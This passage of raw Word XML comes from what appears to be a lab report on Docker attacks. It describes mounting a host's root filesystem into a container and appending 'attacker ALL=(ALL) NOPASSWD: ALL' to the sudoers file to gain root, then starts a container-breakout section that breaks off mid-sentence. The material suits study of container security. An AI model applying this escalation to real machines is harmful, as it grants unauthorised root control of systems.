        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc86858616"/>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: run the Docker image.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p w14:paraId="394E3C82" w14:textId="5A7B0DD7" w:rsidR="006C3230" w:rsidRPr="006C3230" w:rsidRDefault="006C3230" w:rsidP="006C3230">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A container is then created with the command shown in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>. The command specifies a volume that allows to mount the</w:t>
      </w:r>
      <w:r w:rsidR="007532D7">
        <w:t xml:space="preserve"> host’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root file system and put it </w:t>
      </w:r>
      <w:r w:rsidR="007532D7">
        <w:t>in the working directory defined in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007532D7">
        <w:t>, which is /attacker.</w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t xml:space="preserve"> Also, the container </w:t>
      </w:r>
      <w:r w:rsidR="002B3C9A">
        <w:t>is defined to run</w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t xml:space="preserve"> in interactive mode</w:t>
      </w:r>
      <w:r w:rsidR="0049573C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t>enabl</w:t>
      </w:r>
      <w:r w:rsidR="0049573C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t xml:space="preserve"> the attacker to execute bash commands on the container. The </w:t>
      </w:r>
      <w:r w:rsidR="002B3C9A">
        <w:t>output shows that the user has a root privilege within the current Docker instance or container. This means that the attacker has root access to the target’s file system, the Ubuntu laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E73B9" w14:textId="6B24FE00" w:rsidR="00320B5F" w:rsidRDefault="006C3230" w:rsidP="007532D7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="619D80BE" wp14:editId="7A92C1E2">
            <wp:extent cx="4544060" cy="859155"/>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44060" cy="859155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05312C6E" w14:textId="5BE2A133" w:rsidR="007532D7" w:rsidRDefault="007532D7" w:rsidP="007532D7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc86858617"/>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A container with volume mounted, giving shell access.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="2300835E" w14:textId="429CC874" w:rsidR="0049573C" w:rsidRPr="0049573C" w:rsidRDefault="00A1331B" w:rsidP="00C110E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0049573C">
        <w:t xml:space="preserve">he attacker can run root commands within the container and thus edit the sudoers </w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t>file system on the Ubuntu laptop, as shown in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve">he attacker cannot run vim or nano </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">text </w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve">editors </w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve"> they are not installed on the container</w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E303ED9" w14:textId="7FA9C3F4" w:rsidR="0049573C" w:rsidRDefault="0049573C" w:rsidP="0049573C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013F348B" wp14:editId="718454A2">
            <wp:extent cx="3657600" cy="267005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63264" cy="2674189"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149CB06" w14:textId="1AA960AE" w:rsidR="00C110E4" w:rsidRDefault="005B46CB" w:rsidP="00C110E4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc86858618"/>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: access to the host’s sudoers file system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="18A43F4C" w14:textId="391AEA0D" w:rsidR="00C110E4" w:rsidRPr="00C110E4" w:rsidRDefault="00A1331B" w:rsidP="00A1331B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>However, the attacker can echo and append the syntax to the sudoers files using the commands given in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The syntax “attacker ALL=(ALL) NOPASSWD: ALL” permits the </w:t>
      </w:r>
      <w:r w:rsidR="003C4F66">
        <w:t xml:space="preserve">attacker to run commands </w:t>
      </w:r>
      <w:r w:rsidR="00487F65">
        <w:t xml:space="preserve">using sudo </w:t>
      </w:r>
      <w:r w:rsidR="003C4F66">
        <w:t>without a password and is appended to the mount point /attacker/etc/sudoers.</w:t>
      </w:r>
      <w:r w:rsidR="00487F65">
        <w:t xml:space="preserve"> At this point, the attacker escalates his/her privilege to a root user and now can run any root commands on the Ubuntu laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4773E" w14:textId="0CF7DEFC" w:rsidR="00C110E4" w:rsidRDefault="00C110E4" w:rsidP="00C110E4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B26F791" wp14:editId="36152B05">
            <wp:extent cx="5229860" cy="457200"/>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29860" cy="457200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C321FCC" w14:textId="5C0888F2" w:rsidR="003C4F66" w:rsidRDefault="003C4F66" w:rsidP="00487F65">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc86858619"/>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: appendi</w:t>
      </w:r>
      <w:r w:rsidR="00487F65" w:rsidRPr="00487F65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ng the syntax to run sudo commands without password.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="70136447" w14:textId="6C102318" w:rsidR="006554BD" w:rsidRPr="006554BD" w:rsidRDefault="00B11C32" w:rsidP="003719C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F5764D">
        <w:t>shows</w:t>
      </w:r>
      <w:r w:rsidR="006B1D89">
        <w:t xml:space="preserve"> the evidence that the attacker </w:t>
      </w:r>
      <w:r w:rsidR="004E0E5B">
        <w:t>has</w:t>
      </w:r>
      <w:r w:rsidR="000079EE">
        <w:t xml:space="preserve"> now</w:t>
      </w:r>
      <w:r w:rsidR="004E0E5B">
        <w:t xml:space="preserve"> the ability to run </w:t>
      </w:r>
      <w:r w:rsidR="00464103">
        <w:t xml:space="preserve">any sudo commands as </w:t>
      </w:r>
      <w:r w:rsidR="00A369ED">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00464103">
        <w:t>root without supplying</w:t>
      </w:r>
      <w:r w:rsidR="00FE724B">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00464103">
        <w:t xml:space="preserve"> password.</w:t>
      </w:r>
      <w:r w:rsidR="000726B4">
        <w:t xml:space="preserve"> As a result, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00E91AC9">
        <w:t xml:space="preserve">manages to be part of the sudoers group using the </w:t>
      </w:r>
      <w:r w:rsidR="001F04AB">
        <w:t xml:space="preserve">privilege escalation technique. </w:t>
      </w:r>
      <w:r w:rsidR="00D9263A">
        <w:t xml:space="preserve">This means that the </w:t>
      </w:r>
      <w:r w:rsidR="00653D1D">
        <w:t xml:space="preserve">attacker </w:t>
      </w:r>
      <w:r w:rsidR="002F32B8">
        <w:t xml:space="preserve">becomes a root user and </w:t>
      </w:r>
      <w:r w:rsidR="00F95448">
        <w:t xml:space="preserve">can run any commands </w:t>
      </w:r>
      <w:r w:rsidR="00750A96">
        <w:t>on the host machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7AE4EA" w14:textId="6277827F" w:rsidR="005B46CB" w:rsidRDefault="00F85FF2" w:rsidP="006554BD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47185459" wp14:editId="26FD08A6">
            <wp:extent cx="4900295" cy="2895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01989" cy="2896601"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD63408" w14:textId="496D370B" w:rsidR="00B530C6" w:rsidRDefault="000D1AA5" w:rsidP="00464D55">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc86858620"/>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BF7E92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00BE7D83" w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidR="00BF7E92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidR="006A1D35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00BE7D83" w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> added to the</w:t>
      </w:r>
      <w:r w:rsidR="00464D55" w:rsidRPr="00464D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudoers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="115A1DC4" w14:textId="23652EAB" w:rsidR="00902E23" w:rsidRDefault="00B178B4" w:rsidP="00B178B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc86859298"/>
      <w:r>
        <w:t>Container breakout</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03A0F6" w14:textId="3A52C836" w:rsidR="008D1C38" w:rsidRDefault="007D5772" w:rsidP="0005151D">
      <w:r>
        <w:t xml:space="preserve">This attack utilises a simple </w:t>
      </w:r>
      <w:r w:rsidR="00102EBA">
        <w:t>SSH service to demonstrate container to container attack or</w:t>
      </w:r>
      <w:r w:rsidR="00BA30AA">
        <w:t xml:space="preserve"> known as container breakout</w:t>
      </w:r>
      <w:r w:rsidR="00A51A1E">
        <w:t>, and also container to host attack</w:t>
      </w:r>
      <w:r w:rsidR="00CF242C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C25AE">
        <w:t xml:space="preserve"> The attack</w:t>
      </w:r>
      <w:r w:rsidR="00E235F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA10AA">
